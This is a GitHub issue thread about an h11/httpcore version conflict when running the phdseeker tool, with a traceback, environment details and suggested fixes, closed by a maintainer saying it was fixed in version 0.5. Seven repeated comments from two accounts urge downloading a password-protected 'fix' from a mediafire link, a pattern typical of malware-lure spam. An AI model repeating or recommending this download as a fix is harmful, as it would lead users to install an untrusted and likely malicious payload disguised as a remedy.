### ISSUE TITLE
Version Conflict between h11 and httpcore Packages

### ISSUE THREAD

**Issue by shure-dev** [Aghababaei/PhD-Seeker#19]
#### Description

I encountered a version conflict between the `h11` and `httpcore` packages while trying to run the `phdseeker` tool in my virtual environment. The error message indicates that the installed version of `h11` (0.8.1) is incompatible with `httpcore`, which requires `h11<0.15,>=0.13`.

#### Steps to Reproduce

1. Activate the virtual environment.
2. Run the command:
   ```bash
   phdseeker -k 'Computer Science, Machine Learning'
   ```
3. Observe the following error:

   ```bash
   Traceback (most recent call last):
     File "/path/to/myenv/lib/python3.7/site-packages/pkg_resources/__init__.py", line 584, in _build_master
       ws.require(__requires__)
     File "/path/to/myenv/lib/python3.7/site-packages/pkg_resources/__init__.py", line 901, in require
       needed = self.resolve(parse_requirements(requirements))
     File "/path/to/myenv/lib/python3.7/site-packages/pkg_resources/__init__.py", line 792, in resolve
       raise VersionConflict(dist, req).with_context(dependent_req)
   pkg_resources.ContextualVersionConflict: (h11 0.8.1 (/path/to/myenv/lib/python3.7/site-packages), Requirement.parse('h11<0.15,>=0.13'), {'httpcore'})
   ```

#### Expected Behavior

The command should run successfully without any version conflict between the `h11` and `httpcore` packages.

#### Actual Behavior

The command fails with a `pkg_resources.ContextualVersionConflict` error, indicating a version conflict between the `h11` and `httpcore` packages.

#### Environment

	•	Python version: 3.7
	•	Operating System: Mac OS
	•	h11 version: 0.8.1
	•	httpcore version: 0.17.3

#### Suggested Resolution

It seems that the issue arises due to an incompatible version of `h11` installed in the environment. A potential solution could involve either:

1. Updating the `phdseeker` tool or its dependencies to ensure compatibility with newer versions of `h11` and `httpcore`.
2. Pinning the `h11` package to a compatible version that satisfies both `phdseeker` and `httpcore` requirements.

I hope this information helps in resolving the issue. Please let me know if additional details are required.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by javadr** [comment]
fixed in version 0.5
